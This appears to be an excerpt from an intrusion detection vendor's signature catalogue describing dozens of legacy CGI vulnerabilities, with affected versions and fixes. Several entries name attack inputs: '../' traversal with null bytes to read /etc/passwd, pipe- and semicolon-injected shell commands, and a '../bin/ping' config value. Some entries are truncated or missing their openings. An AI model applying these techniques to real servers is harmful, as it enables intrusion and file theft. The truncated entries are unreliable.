Signature ID: 1041
IWeb Hyperseek 2000 Directory Traversal Vulnerability
Signature Description: Hyperseek Search Engine is industrial strength directory and search engine software. SQL
Database driven, feature-packed, web based configuration and setup, fully Template based customization. Designed for
speed, heavy traffic, and user friendliness. iWeb Systems HyperSeek 2000 version is vulnerable to directory traversal.
These versions software's hsx.cgi script does not validate properly the user given data, the request contains '../'
sequences and '%00' escape characters, the remote attackers are could send this type of specially-crafted URL requests
send to hsx.xgi script, then will disclose the directory listing and files and directories of the target(web server) with
read permissions.
Signature ID: 1042
WEB-CGI LWGate access Vulnerability
Signature Description: LWGate is a CGI script, which allows WWW clients to send information to HTTP servers. It
uses PATH_INFO variable to know which 'page' of information you want. This rule triggered when an attacker access
to the LWGate script. This successful exploitation can allow an attacker to gain unauthorized administrative access to
the server or execute arbitrary code on the web server.
Signature ID: 1043
MDaemon form2raw.cgi access vulnerability
Bugtraq: 9317
Signature Description: Alt-N Technologies provides affordable Windows-based software, including an email server,
email antivirus and antispam protection, Outlook integration, and network fax management software. MDaemon
protects your users from spam and viruses, provides full security, includes seamless web access to your email via
WorldClient, remote administration. MDaemon/WorldClient Alt-N MDaemon 6.8.5 and below versions are vulnerable,
a malicious user(remote attacker) will send with more than 249 bytes in the "From" field to FROM2Raw.cgi script,
when processing that request by MDaemon will cause a Stack buffer overflow. Then the attacker can execute arbitrary
code in the context of the vulnerable software in order to gain unauthorized access. Patches are not available.
Signature ID: 1044
MDaemon form2cgi buffer overflow vulnerability
Bugtraq: 9317
126
Signature Description: Alt-N Technologies provides affordable Windows-based software, including an email server,
email antivirus and antispam protection, Outlook integration, and network fax management software. MDaemon
protects your users from spam and viruses, provides full security, includes seamless web access to your email via
WorldClient, remote administration. MDaemon/WorldClient Alt-N MDaemon 6.8.5 and below versions are vulnerable,
a malicious user(remote attacker) will send with more than 249 bytes in the "From" field to FROM2Raw.cgi script,
when processing that request by MDaemon will cause a Stack buffer overflow. Then the attacker can execute arbitrary
code in the context of the vulnerable software in order to gain unauthorized access. Patches are not available.
Signature ID: 1045
Nph-maillist Arbitrary Code Execution vulnerability
Signature Description: Nph-maillist is a Perl CGI script that handles mailing lists, the email list generator is a web
interfaced script that allows the visitors on web site to leave their email address so they may be notified when update
the web site. This script also provides the the ability to create and change the message wish to send to list right from the
web browser as well as to maintain the list being generated. Matt Tourtillott nph-maillist 3.5 and 3.0 are vulnerable, in
this software 'nph-maillist.pl' script carries all the functionality for the web interface, a malicious-user(remote attacker)
can enter commands embedded in an email address via the subscription form, and then force a mailing which will
execute the commands. Patches are not available.
Signature ID: 1046
Oracle reports stack overflow vulnerability
Signature Description: Reports Server is a commercially available reporting package distributed by Oracle.A stack
overflow has been reported in one of the Oracle Reports Server CGI programs (rwcgi60). This condition may be
triggered by supplying an overly long string as a value for the 'setauth' method.This buffer overflow may allow a user
to remotely execute code on a vulnerable system. In doing so, a remote user may be able to gain access to the local
system, and potentially the privileges of the webserver.Oracle Oracle9i Application Server Reports 9.0.2 and Oracle
Oracle Reports6i 6.0.8 are prone to this vulnerability.
Signature ID: 1047
SGI IRIX infosearch fname Vulnerability
Signature Description: IRIX is a computer operating system developed by SGI to run natively on their 32-bit and 64bit MIPS architecture workstations and servers. The InfoSearch package converts man pages and other documentation
into HTML web content, the search form uses infosrch.cgi. SGI IRIX 6.5.7 and below versions are vulnerable, these
versions are not properly validating the user input to infosrch.cgi scripte, 'fname' variable, so it is allowing commands
to be executed at the webserver privilege level by remote web users. Patches are available at sgi website.
Signature ID: 1048
SIX-webboard 2.01 File Retrieval vulnerability
Signature Description: SIX-webboard is a Web bulletin board application developed by Sixhead. The generate.cgi
script in SIX-webboard version 2.01 is vulnerable, it could allows a remote attacker to traverse directories on the Web
server. There is no proper validation for user input of to content paramete, so attacker will send a request, that request
URL containing 'dot dot' sequences (/../) in the "content" parameter to "generate.cgi" script to traverse directories and
view arbitrary files outside of the Web root directory. No remedy available as of August 2008.
127
Signature ID: 1050
Talentsoft Web+ Example Script File Disclosure Vulnerability
Bugtraq: 1725
Signature Description: Web+ is a development language for use in creating web-based client/server applications.In
Linux versions of the product, an example script installed in Web+ (Web+Ping) which fails to correctly filter shell meta
characters. As a result, parameters passed to this script may contain malicious shell commands, allowing an attacker to
remotely execute or read any file which is accessible by the Web+ user.Windows NT versions of Web+ are apparently
not vulnerable.TalentSoft Web+ Application Server (Linux) 4.6 is prone to this vulnerability.
Signature ID: 1051
Bytes Interactive Web Shopper Directory Traversal Vulnerability
Signature Description: The Web Shopper is a shopping cart/cart management product by Bytes Interactive, it can be
used to develop both a catalogue as well as custom HTML pages, and allows the designer to determine the layout,
language, currency, and the overall look of a shopping cart. Bytes Interactive Web Shopper 2.0 and Bytes Interactive
Web Shopper 1.0 are vulnerable versions. By default, the newpage variable not validating properly for "dot dot" (/../)
sequences. So a remote attacker can submit a specially-crafted URL containing "dot dot" (/../) sequences to view
arbitrary files on the Web server, such as /etc/passwd. Successful exploitation could lead to a remote intruder gaining
read access to any known file.
Signature ID: 1052
Web Shopper shopper.cgi directory traversal vulnerability
Signature Description: The Web Shopper is a shopping cart and cart management product by Bytes Interactive. It can
be used to develop both a catalogue as well as custom HTML pages, and allows the designer to determine the layout,
language, currency, and the overall look of a shopping cart. Bytes Interactive Web Shopper shopping cart program
(shoper.cgi) 2.0 and earlier versions are vulnerable, this version may allows a remote attacker to traverse directories on
the server. By default, the newpage variable not properly checking for "dot dot" (/../) sequences. The remote
user(attacker) can submit a specially-crafted URL containing "dot dot" sequences with newpage parameter to
shoper.cgi script, then he can view arbitrary files on the Web server, such as /etc/passwd. No remedy available as of
August 2008.
Signature ID: 1053
Drummon Miles A1Stats Directory Traversal Vulnerability
Signature Description: A1Stats is a CGI product by Drummon Miles used to report on a website's visitor
traffic. Drummond Miles A1Stats 1.6 and prior versions are vulnerable, these versions are not validating properly
the user supplied input submitted as uerystrings to the Aa1disp3.cgi script. An attacker will send crafted with a long
path including '/../' sequences, and submit it as a file request to the product's built-in webserver. These type requests
will not be filtered from the path, permitting the attacker to specify files outside the directory tree normally available to
users. Patches are available at vendor website.
128
Signature ID: 1054
Drummon Miles A1Stats Directory Traversal Vulnerability
traffic. Drummond Miles A1Stats 1.6 and prior versions are vulnerable, these versions are not validating properly
the user supplied input submitted as uerystrings to the Aa1disp2.cgi and Aa1disp4.cgi scripts. An attacker will send
crafted with a long path including '/../' sequences, and submit it as a file request to the product's built-in webserver.
These type requests will not be filtered from the path, permitting the attacker to specify files outside the directory
tree normally available to users. Patches are available at vendor website.
Signature ID: 1055
A1Stats Directory Traversal Vulnerability
traffic.Versions 1.0 of this product fail to properly validate user-supplied input submitted as uerystrings to the A1Stats
script.An attacker can compose a long path including '/../' sequences, and submit it as a file request to the product's
built-in webserver. 'dot dot' sequences will not be filtered from the path, permitting the attacker to specify files outside
the directory tree normally available to users.
Signature ID: 1056
AdCycle Remote SQL Query Modification Vulnerability
Signature Description: AdCycle is a set of shareware ad management scripts written in Perl and back-ended by
MySQL. Adcycle.com Adcycle 1.12 to Adcycle.com Adcycle 1.17 are vulnerable to this attacks. These verions
may allow a remote attacker to modify the logic of an existing SQL query and manipulate the MySQL database and
other databases to which the AdCycle CGI process has access. These vulnerable versions are not validating properly
multiple unspecified CGI variables before passing them to MySQL queries. No remedy available as of August 2008.
Signature ID: 1057
Slashcode User Account Compromise Vulnerability
Industry ID: CVE-CVE-2002-1748 Bugtraq: 3839
Signature Description: Slashcode is a bulletin board, discussion and portal framework. It is widely used, and is behind
the popular Slashdot page. Slashcode 2.1 to 2.2.2 versions are vulnerable, these verions are allowing a remote attacker
with a valid account to gain unauthorized access to other arbitrary accounts. As valid user may gain access to another
user account ar administrative accounts, and get full control of the site is possible through this exploitation. Update
latest verions Slashcode 2.2.3 found at slashcode website.
Signature ID: 1058
Leif M. Wright ad.cgi Unchecked Input Vulnerability
application software with an information server, commonly a web server. Here ad.cgi CGI program by Leif Wright,
Leif M. Wright's ad.cgi 1.0 version is vulnerable, it could allow a remote attacker to execute arbitrary commands on the
Web server, because of this is not validating properly the user inputs, then a remote attacker may allows access to
129
 restricted resources. The problem occurs in the method in which the script checks input. A remote attacker can use
the FORM method and send a request with file paramete, to execute arbitrary commands on the system with privileges
of the Web server. No remedy available as of August 2008.
Signature ID: 1059
Alchemy Eye Remote Command Execution Vulnerability
Signature Description: Alchemy Eye is a network monitor tool for Windows based environments, this tool monitors
the server accessibility and performance, network Alchemy Eye is maintained by alchemy labs. Alchemy Lab Alchemy
Eye versions 2.6.19 through 3.0.10. are vulnerable. There is possible the directory traversal then remote attacker could
execute arbitrary command execution. Successful exploitation can lead to attackers gaining access to the host. An
attackers can traverse out of the root directory by placing MS-DOS device name "NUL" before the first "../". No
remedy available as of August 2008.
Signature ID: 1060
Alchemy Eye Remote Command Execution Vulnerability
Signature Description: Alchemy Eye is a network monitor tool for Windows based environments, this tool monitors
the server accessibility and performance, network Alchemy Eye is maintained by alchemy labs. Alchemy Lab Alchemy
Eye versions 2.6.19 through 3.0.10. are vulnerable. There is possible the directory traversal then remote attacker could
execute arbitrary command execution. Successful exploitation can lead to attackers gaining access to the host. An
attackers can traverse out of the root directory by placing MS-DOS device names before the first "../". The vendor
attempted to fix this vulnerability, Alchemy Lab Alchemy Eye 3.0.11 verions is not vulnerable plz update this version,
available at vendor website.
Signature ID: 1061
Alya.cgi access vulnerability
Nessus: 11118
Signature Description: This event is generated when an attempt is made to gain unauthorized access to a CGI
application running ona web server. Some applications do not perform stringent checks when validating the credentials
of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly
escalated privileges to that of the administrator. This can lead to unauthorized access and possibly escalated
privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships
between the victim server and other hosts can be exploited by the attacker.
Signature ID: 1062
Anaconda Foundation Directory Traversal Vulnerability
Signature Description: The Anaconda Foundation Directory allows user to dynamically integrate the amazing content
into user site's own look and feel. Anaconda Foundation Directory 1.9, Anaconda Foundation Directory 1.7, Anaconda
Foundation Directory 1.6, Anaconda Foundation Directory 1.5, Anaconda Foundation Directory 1.4 are vulnerable
versions. A remote attacker could send a dot dot sequence('../' technique) and by appending a null byte followed by
'.html' to the extension of the filename in question to 'apexec.pl' script in conjunction with the variable 'template'. After
received the request it is not validating properly, so the attacker can read any file on the Web server with privileges of
HTTPD.
130
Signature ID: 1063
Anyform CGI Semicolon Vulnerability
Signature Description: Any Form is a popular perl CGI script, this support simple forms that deliver responses via
email. That is collects data from a WWW-Form and sends it to a specified e-mail address. It can either use a
sendmail type program or directly contact a SMTP host via sockets to send messages. It can be used on any platform.
AnyForm versions 1.0 and 2.0 are vulnerable, these verions are not perform user supplied data sanity checking and
could be exploited by remote intruders to execute arbitrary commands. These commands were issued as the UID which
the web server runs as, typically 'nobody'. This rule detects unauthorized administrative access to the server or possible
execution of arbitrary code due to anform2 running in the webserver. John S. Roberts AnyForm 3.0 and John S.
Roberts AnyForm 4.0 are not vulnerable, so update any one version from this.
Signature ID: 1064
Archie access Vulnerability
Signature Description: Archie is a program and used to search for file names on Internet FTP sites and recorded
information about the files. Archie applications are available from many major Internet sites. This rule will be trigger
when an attacker requesting the 'archie', then the attacker can gain unauthorized access and obtain sensitive
information.
Signature ID: 1065
Perlshop.cgi shopping cart program directory traversal vulnerability
Signature Description: PerlShop.cgi allows remote users to access files in the web-root directory files via HTTP
request. This cgi procedures fails to check the authentications and allows all the users to access other than web-root, for
example /store/customers/ or /store/temp_customers/ directories, using this vulnerability remote attackers can view the
sensitive information of the affected system.
Signature ID: 1067
Ax-admin.cgi access Vulnerability
Signature Description: Ax-admin scirpt creates a list of URL's. The list is hyperlinked. If may click on the link from
admin server and then jump right to site. And the URL might contain sensitive information. This rule will triggers
when an attacker access to the ax-admin.cgi script, an attacker can use this vulnerability to delete logs or overwrite
system files.
Signature ID: 1068
Axs.cgi access Vulnerability
Signature Description: The AXS Script is a cgi or perl script that keeps track of the number, the source locations, the
clientinfo of visitors to http. It writes this data to an output file, named log.txt. This rule will triggers when an attacker
can access to the axs.cgi script. This successful exploitation can allow an attacker to gain sensitive information and
grabs the info about the visitors.
131
Signature ID: 1069
Big Brother file browsing Vulnerability
Signature Description: Big Brother is a loosely-coupled distributed set of tools for monitoring and displaying the
current status of an entire network and notifying the admin should need be. Sean MacGuire Big Brother 1.0 9c and
Sean MacGuire Big Brother 1.0 9b are vulnerable versions. In these verions the CGI script bb-hist.sh, the new history
viewer, can be exploited to allow the partial display of local files provided they are readable by the user id CGI scripts
are executed under by the web server, and that they are text based. Patches are available at vendor website, Sean
MacGuire Big Brother 1.0 9b is not vulnerable update this verions or latest version.
Signature ID: 1070
Big Brother bb-hist.sh file browsing vulnerability
Sean MacGuire Big Brother 1.0 9b are vulnerable versions. In these verions the CGI script bb-hist.sh, the new history
MacGuire Big Brother 1.0 9b is not vulnerable update this verions or latest version .
Signature ID: 1071
Bb-histlog.sh information disclosure vulnerability
Industry ID: CVE-1999-1462 Bugtraq: 142 Nessus: 10025 ,10025
Sean MacGuire Big Brother 1.0 9b are vulnerable versions. In these verions the CGI script bb-histlog.sh, the new
history logs viewer, can be exploited to allow the partial display of local files provided they are readable by the user id
CGI scripts are executed under by the web server, and that they are text based. Patches are available at vendor website,
Sean MacGuire Big Brother 1.0 9b is not vulnerable update this verions or latest version .
Signature ID: 1073
BB4 Technologies Big Brother Directory Traversal Vulnerability
current status of an entire network and notifying the admin should need be. Big Brother 1.4h1 and earlier versions are
vulnerable, in these versions the CGI script bb-hist.sh is allowing remote attackers to read arbitrary files via a dot dot
sequencing with HOSTSVC parameter. When the server received this type URL request from client(attacker), this
attacker can be exploit the partial display of local files provided they are readable by the user id CGI scripts are
executed under by the web server, and that they are text based. Patches are available at vendor website.
Signature ID: 1074
Big Brother bb-rep.sh base file browsing vulnerability
132
Sean MacGuire Big Brother 1.0 9b are vulnerable versions. In these verions the CGI script bb-rep.sh, the new history
MacGuire Big Brother 1.0 9b is not vulnerable update this verions or latest version.
Signature ID: 1075
Big Brother bb-replog.sh based file browsing vulnerability
Sean MacGuire Big Brother 1.0 9b are vulnerable versions. In these verions the CGI script bb-replog.sh, the new
history viewer, can be exploited to allow the partial display of local files provided they are readable by the user id CGI
scripts are executed under by the web server, and that they are text based. Patches are available at vendor website, Sean
MacGuire Big Brother 1.0 9d is not vulnerable update this verions or latest version.
Signature ID: 1076
EXtropia bbs_forum.cgi Remote Arbitrary Command Execution Vulnerability
Signature Description: Bbs_forum.cgi is a popular Perl cgi script from eXtropia.com. It supports the creation and
maintenance of web-based threaded discussion forums. eXtropia WebBBS, version 1.0.0, could allow an attacker to
traverse directories on the web serve. This issue is triggered when an attacker can send a malformed URL to the
bbs_forum.cgi script containing "dot dot" sequences(/../). The successful exploitation can allow an attacker to read any
file on the web server and execute arbitrary code on the web server. This issued is fixed in the version of WebBBS(2.0
or later). Install this version on system for removing this vulnerability, which available at vendor's web site.
Signature ID: 1077
Brian Stanback bslist.cgi Remote Command Execution Vulnerability
Signature Description: This rule detects when attacker send a specially-crafted request to the bslist.cgi containing
improper filtering of the character ';'. The successful exploitation of this issue will allow an attacker to execute arbitrary
commands on the system and obtain the system's etc/passwd file. The affected version of bslist.cgi is 1.0.0. The issue is
fixed in the version 1.5 or later. Update this version for removing this vulnerable, which is available at vendor's web
site.
Signature ID: 1079
Matt Kruse Calendar Arbitrary Command Execution Vulnerability
Internet. It allows a website administrator to easily setup and customize a calendar on their website. Matt Kruse
Calendar Script 2.2 is vulnerable to execute arbitrary code. A remote attacker could send a URI request to calender.pl
that request contains metacharacters, after received the request it is not parsing the user input values for metacharacters.
It is therefor possible to execute arbitrary commands on the target host by passing "|shell command|" as one value of
the "configuration file" field. The shell that is spawned with the open() call will then execute those commands with the
uid of the webserver. This can result in remote access to the system for the attacker.
133
Signature ID: 1080
Matt Kruse Calendar Arbitrary Command Execution Vulnerability
Internet. It allows a website administrator to easily setup and customize a calendar on their website. Matt Kruse
Calendar Script 2.2 is vulnerable to execute arbitrary code. A remote attacker could send a URI request to
calender_admin.pl that request contains metacharacters, after received the request it is not parsing the user input values
for metacharacters. It is therefor possible to execute arbitrary commands on the target host by passing "|shell
command|" as one value of the "configuration file" field. The shell that is spawned with the open() call will then
execute those commands with the uid of the webserver. This can result in remote access to the system for the attacker.
Signature ID: 1081
NCSA HTTPd campas sample script Vulnerability
Signature Description: NCSA HTTPd is an HTTP compatible server for making hypertext and other documents
available to Web browsers, much in the same way that NCSA Mosaic is a program to browse information in the World
Wide Web. From the Client-Server viewpoint, NCSA HTTPd is the Server to the Browser Client. Campas NCSA
HTTPd verion 1.2 is vulnerable, this version is not properly validating user supplied variable inputs, and as a
result can be used to execute commands on the host with the privileges of the web server. Commands can be passed as
a variable to the script, separated by %0a (linefeed) characters. Successful exploitation of this vulnerability could be
used to deface the web site, read any files the server process has access to, get directory listings, and execute anything
else the web server has access to. Remedy is upgrade HTTP server to the latest available version.
Signature ID: 1082
CGIScript.net csPassword.CGI Password.CGI.TMP File Disclosure Vulnerability
Signature Description: CGIScript.net provides various webmaster related tools and is maintained by Mike Barone and
Andy Angrick. The csPassword.cgi script developed by CGIScript.net, CGISCRIPT.NET csPassword 1.0 version is
vulnerable, There is a possibility for a user to obtain access to the temporary(password.cgi.tmp) file, generated by the
script, containing usernames and unencrypted passwords. Patches may be available at vendor website(cgiscript
website).
Signature ID: 1084
CSSearch Remote Command Execution Vulnerability
Signature Description: CsSearch is a free perl cgi search script developed by Mike Barone and Andy Angrick
 csSearch stores it's configuration data as perl code in a file called "setup.cgi" which is evaluated by the script to
load it back into memory at runtime. csSearch.cgi in csSearch 2.3 and earlier versions are vulnerable, these versions are
allowing attackers to execute arbitrary code via the savesetup command and the "setup" parameter, with the
privileges of the web server process. These versions are not properly validating use inputs, so any user can cause
configuration data to be written to "setup.cgi" and execute arbitrary code(perl code) on the server. Patches are available
at cgiscript website.
134
Signature ID: 1085
Bonsai CGI request reveals path information vulnerability
Signature Description: Bonsai is tree control is a tool, that perform queries on the contents of a CVS archive; we can
get a list of checkins, what checkins have been made by a given person, or on a given CVS branch, or in a particular
time period. It also includes tools for looking at checkin logs (and comments) to making differences between various
versions of a file. and finding out which person is responsible for changing a particular line of code. Mozilla
Bonsai 1.3 verion is vulnerable, these versions allowing a remote attacker to obtain sensitive information. An attacker
can discover the location of the Mozilla Bonsai application by sending a malformed request to the application, which
produces an error. The error message shows the full path of the cvslog.cgi file, providing the attacker with
 information about the server directory structure. Patches are available at debian website.
Signature ID: 1086
Mozilla Bonsai Path Disclosure Vulnerability
Signature Description: Bonsai is tree control is a tool, that perform queries on the contents of a CVS archive; we can
get a list of checkins, what checkins have been made by a given person, or on a given CVS branch, or in a particular
time period. It also includes tools for looking at checkin logs (and comments) to making differences between various
versions of a file. and finding out which person is responsible for changing a particular line of code. Mozilla
Bonsai 1.3 verion is vulnerable, these versions allowing a remote attacker to obtain sensitive information. An attacker
can discover the location of the Mozilla Bonsai application by sending a malformed request to the application, which
produces an error. The error message shows the full path of the cvsview2.cgi file, providing the attacker with
 information about the server directory structure. Patches are available at debian website.
Signature ID: 1087
SGI IRIX 6.2 day5datacopier.cgi Untrusted search path vulnerability
Signature Description: The IRIX is Operating system, this operating system is the leading technical high-performance
64-bit operating system based on industry-standard UNIX. SGI has been designing scalable platforms based on the
IRIX operating system to connect technical and creative professionals to a world of innovation and discovery.
day5datacopier in SGI IRIX 6.2 is vulnerable, The IRIX day5datacopier CGI script is allowing a local attacker to
execute arbitrary commands on the system with root privileges via a modified PATH environment variable that points
to a malicious cp program. This can lead to unauthorized access and possibly escalated privileges to that of
the administrator. Data stored on the machine can be compromised and trust relationships between the victim
server and other hosts can be exploited by the attacker.No remedy available as of August 2008.
Signature ID: 1088
SGI IRIX 6.2 day5datanotifier.cgi Untrusted search path vulnerability
IRIX operating system to connect technical and creative professionals to a world of innovation and discovery.
day5datacopier in SGI IRIX 6.2 is vulnerable, The IRIX day5datacopier CGI script is allowing a local attacker to
execute arbitrary commands on the system with root privileges via a modified PATH environment variable that points
to a malicious cp program. No remedy available as of August 2008.
135
Signature ID: 1089
IBM Net.Data db2www.cgi Buffer overflow vulnerability
Signature Description: IBM Net.Data is a scripting language used to create web applications, it supports a wide range
of language environments and is compatible with most recognized databases.Net. Data contains a vulnerability which
reveals server information. IBM, Net.Data 6.1 is is vulnerable, when a malicious user (remote attacker) requesting a
specially crafted URL(that contains long value to PATH_INFO variables), by way of the CGI application, this verions
does not validating properly this type of requests, the server comprised of an invalid request and known database,
then the attacker will reveal the physical path of server files. Successful exploitation of this vulnerability could assist in
further attacks against the victim host. Patches are available at vendor website.
Signature ID: 1090
DCForum dcboard.cgi Remote Admin Privilege Compromise Vulnerability
Signature Description: DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based
threaded discussion forums. DC Scripts DCForum 2000 1.0 and DC Scripts DCForum 6.0 are vulnerable, DCForum
does not validate properly this user-supplied input information. As a result, an attacker can cause a corruption of the
script's user records by providing a value for the last name field which includes URL-encoded pipes and newlines. By
appending desired values to the last name field, an attacker can insert account information for a new user, and specify
admin privileges.
Signature ID: 1091
Dfire.cgi access vulnerability
Signature Description: The Dragon-Fire IDS remote web interface under version 1.0 has an insecure CGI script which
allows for users to remotely execute commands as the user nobody. And This signature detects an HTTP URL request
for the Dragonfire CGI script file dfire.cgi with a pipe "|" character in one of its arguments.This could lead to a remote
compromise of the system running Dragon-Fire.
Signature ID: 1092
Netwin DNews News Server dnewsweb.cgi Buffer Overflow Vulnerability
Signature Description: Netwin DNEWS Web Server is advanced news server software that makes it easy to provide
users with fast access to Internet news groups. Installing own local news server software also gives to user complete
control to create user's own private or public discussion forums for enhanced communications across the organization
and Internet. NetWin DNews 5.3 version is vulnerable, a malicious user(remote attacker) will send a specially-crafted
overly long arguments request NetWin DNews dnewsweb.cgi script (including but not limited to "group," "cmd," and
"utag"), a buffer overflow condition will occur. This can lead to the remote execution of arbitrary code. patches may
Signature ID: 1093
IBM Net.Data document.d2w Path Disclosure Vulnerability
136
Signature Description: IBM Net.Data is a scripting language used to create web applications, it supports a wide range
of language environments and is compatible with most recognized databases.Net.Data contains a vulnerability which
reveals server information. Requesting a specially crafted URL, by way of the CGI application, comprised of an invalid
request and known database, will reveal the physical path of server files.Successful exploitation of this vulnerability
could assist in further attacks against the victim host.IBM Net.Data 7.0 is prone to this vulnerability.
Signature ID: 1094
Matt Wright's download.cgi Remote Command Execution Vulnerability
Signature Description: Matt Wright's Script archive is a collection of CGI scripts written in Perl. Matt Wright's Script
Archive provides a File download script which allows users to keep track of the number of file downloads for specific
files. Matt Wright's download.cgi 1.0 vulnerable, this version contains a directory traversal vulnerability where an
attacker can use directory traversal techniques. The malicious user(remote attacker) will send specially-crafted url with
the "f" parameter followed by "../" to download.cgi script, after received this type of requests from user the user passed
input values does not properly validating, so there is a chance to view hidden files on the server.
Signature ID: 1095
Extropia WebStore Directory Traversal Vulnerability
Signature Description: WebStore is the culmination of eXtropia's experience with online shopping applications. It
merges both the Electronic Outlet HTML and Database versions and adds all new routines for error handling, order
processing, encrypted mailing, frames, Javascript and VBscript and other goodies. Extropia WebStore versions 1.0 and
2.0 are vulnerable, the routine web_store.cgi does not properly validating the $file_extension variable if null characters
are used by malicious user(remote attacker). The attacker will send the specially-crafted url with 'page' follwing '../' to
web_store.cgi script. Patches available at vendor website.
Signature ID: 1096
Webmin edit_action.cgi based Directory Traversal Vulnerability
Signature Description: Webmin is a web-based system configuration tool for OpenSolaris, Linux and other Unix-based
systems. With it we can configure many operating system internals, such as users, disk quotas, services, configuration
files etc., as well as modify and control many open source apps. Webmin is largely based on Perl, running as its own
process and web server. Webmin Webmin 0.91 version vulnerable, this version is not validatintg properly '../'
sequences from web requests, so this is the chance to make directory traversal attacks. A malicious user(remote
attacker) could use this directory traversal techniques within an argument sent to the edit_action.cgi script in order to
view hidden files on the server or execute programs to which Webmin has security privileges. No remedy available as
of August 2008.
Signature ID: 1097
EMU Webmail emumail.cgi Script Injection Vulnerability
Signature Description: Emumail is an open source web mail application. It is available for the Unix, Linux, and
Microsoft Windows operating systems. EMUMail EMUMail 5.0 and 5.1 versions for Windows 5.0, EMUMail
EMUMail 5.0 and 5.1 versions for Unix 5.0 and EMUMail EMUMail 5.0 and 5.1 versions for Red Hat Linux 5.0 are
vulnerable versions, these verions does not properly validating user input values in request URL. By using this flaw the
malicious user(attacker) pass an email containing script or html code through the EmuMail web mail interface. This
137
would result in execution of the script code in the security context of the EmuMail site. Update latest verion may
Signature ID: 1098
Sambar Server environ.pl Cross-site Scripting Vulnerability
Bugtraq: 7209
Signature Description: Sambar server is a multi-threaded, extensible application server. Sambar Server, version 5.3 and
earlier, is a cross-site scripting vulnerability. This rule will triggered when an attacker could create a specially-crafted
URL request to the environ.pl, an attacker could use this vulnerability to steal the victim's cookie-based authentication.
Signature ID: 1099
Environ.cgi access Vulnerability
Signature Description: This rule detects when an attacker access a request to the environ.cgi. This CGI script is
commonly requested in vulnerability scans, and attacker can use this vulnerability script to gather system configuration
information.
Signature ID: 1100
Everythingform.cgi Arbitrary Command Execution Vulnerability
Signature Description: Leif Wright's everythingform.cgi script a Perl script that processes multiple forms, contains a
parsing vulnerability in a hidden "config" field that enables an attacker to run arbitrary shell commands with the
security context of the web server.For example attacker can put the value as ../../../../../bin/ping in the "config"
parameter, Post this commands to the everythingform.cgi to run the ping command in the context of webserver. Like
this he can run any arbitrary commands. Leif M. Wright everythingform.cgi 2.0 is prone to this vulnerability
Signature ID: 1101
EZNE.NET Ezboard 2000 Remote Buffer Overflow Vulnerability
Signature Description: Easyboard is a guestbook script that works with a text file for data storage, the display can be
tweaked by setting variables and the script is just one part of code that you have to insert into php page. EZNE.net
ezboard 1.27 version is vulnerable, this version server 'ezadmin.cgi' script is allows a malicious user(remote attacker) to
craft an HTTP request that causes a buffer overflow condition on the web server, and can overwrite system memory
with data included in the URL. The remote attacker will send large amounts of data, normally in some CGI programs,
user supplied data is written to a staticly sized array, the received data is more than the declared array size buffer
overflow will ocuur and overwrite adjacent areas of stack memory. If return pointers are overwritten, arbitrary code
may be executed as the vulnerable process.
Signature ID: 1102
ezboard 1.27 version is vulnerable, this version server 'ezboard.cgi' script is allows a malicious user(remote attacker) to
138
Signature ID: 1103
ezboard 1.27 version is vulnerable, this version server 'ezman.cgi' script is allows a malicious user(remote attacker) to
Signature ID: 1104
FAQManager.CGI NULL Character Arbitrary File Disclosure Vulnerability
Industry ID: CVE-2000-0380 Bugtraq: 3810,1154 Nessus: 10387,10837
Signature Description: FAQManager.cgi is a Perl script, it will maintain a FAQ (Frequently Asked Questions) via a
web interface. It will run on most Unix/Linux and Microsoft Windows platforms. FAQManager is not properly
validating certain types of input from incoming requests to web server. It is possible to append a NULL character
(%00) to a web request and display the contents of an arbitrary web-readable file. FAQManager FAQManager.cgi
versions 2.2.5 and prior versions are vulnerabile. Patches are available at vendor website.
Signature ID: 1105
LakeWeb Filemail CGI script remote arbitrary code execution vulnerability
Signature Description: FileSeek.cgi is an example script that locates and downloads files on a web server, available in
"The CGI/Perl Cookbook," that contains two vulnerabilities due to erroneous parsing An attacker could use "....//" in
the HEAD or FOOT parameter of an HTTP request to fileseek.cgi to view arbitrary files on the server or could use a
similar method to execute shell commands on the web server.
Signature ID: 1106
FileSeek CGI Script File Disclosure Vulnerability
Signature Description: FileSeek.cgi is an example script that locates and downloads files on a web server, Wiley
Computer Publishing Craig Patchett FileSeek2.cgi and Wiley Computer Publishing Craig Patchett FileSeek.cgi are
vulnerable, in there versions the FileSeek.cgi script is not properly validating the user input to parameters. A remote
attacker will send HTTP request with "../" or "..//" to the HEAD or FOOT parameter to fileseek.cgi to view arbitrary
files on the server or could use a similar method to execute shell commands on the web server. Apply the patch for this
vulnerability, as listed in DSINet Advisory.
139
Signature ID: 1107
Flexform access Vulnerability
Signature Description: Flexform Software is available on OpenVMS computers. It is middleware used to produce
documents directly from your OpenVMS applications(OpenVMS(Virtual Memory System)is a multi-user,
multiprocessing virtual memory based operating system designed for use in time sharing, batch processing, real time
and transaction processing). This rule will trigger when an attacker access to the flexform CGI program. This
successful exploitation can allow an attacker to read arbitrary files on the system.
Signature ID: 1108
Faq-O-Matic Form.cgi access vulnerability
Signature Description: Faq-O-Matic is a great little product for managing a bunch of FAQs. It allows people who visit
the site to maintain the FAQ by adding new questions and answers and stuff like that. It has quite a pleasing colour
scheme. Also the name of the product has some real pep, it reminds a vacuum cleaner. Jon Howell Faq-O-Matic 2.712
and Jon Howell Faq-O-Matic 2.711 versions are vulnerable to cross site scripting. where an attacker can craft a URL
with malicious code in the "cmd" argument. If a legitimate user activates the URL, malicious code may be executed on
the client computer with the security context of the web server.
Signature ID: 1109
Formmail Environmental Variables Disclosure Vulnerability
Signature Description: An unauthorized remote user is capable of obtaining CGI environmental variable information
from a web server running Matt Wright FormMail by requesting a specially formed URL that specifies the email
address to send the details to.This is accomplished by specifying a particular CGI environmental variable such as
PATH, DOCUMENT_ROOT, SERVER_PORT in the specially formed URL which will email the results to the
address given. The information obtained could possibly be used to assist in a future attack.Versions 1.6,1.7,1.8 of Matt
Wright FormMail are prone to this vulnerability.
Signature ID: 1110
Gbook.cgi Remote Command Execution Vulnerability
Signature Description: Bill Kendrick GBook.cgi 1.0 is vulnerable version, In these versions software Gbook.cgi script
does not validate properly the user-supplied input to the script's _MAILTO parameter. This allows a malicious
user(remote attacker) to append a ';' character to the definition of the _MAILTO field, followed by text containing
malicious shell commands. These will be executed as the webserver, providing the attacker with an elevation of
privileges, and, if properly exploited, allowing more serious compromises of the host system. Finally the attacker can
execute arbitrary code on the Web server and gain elevated privileges.
Signature ID: 1111
Getdoc.cgi access vulnerability
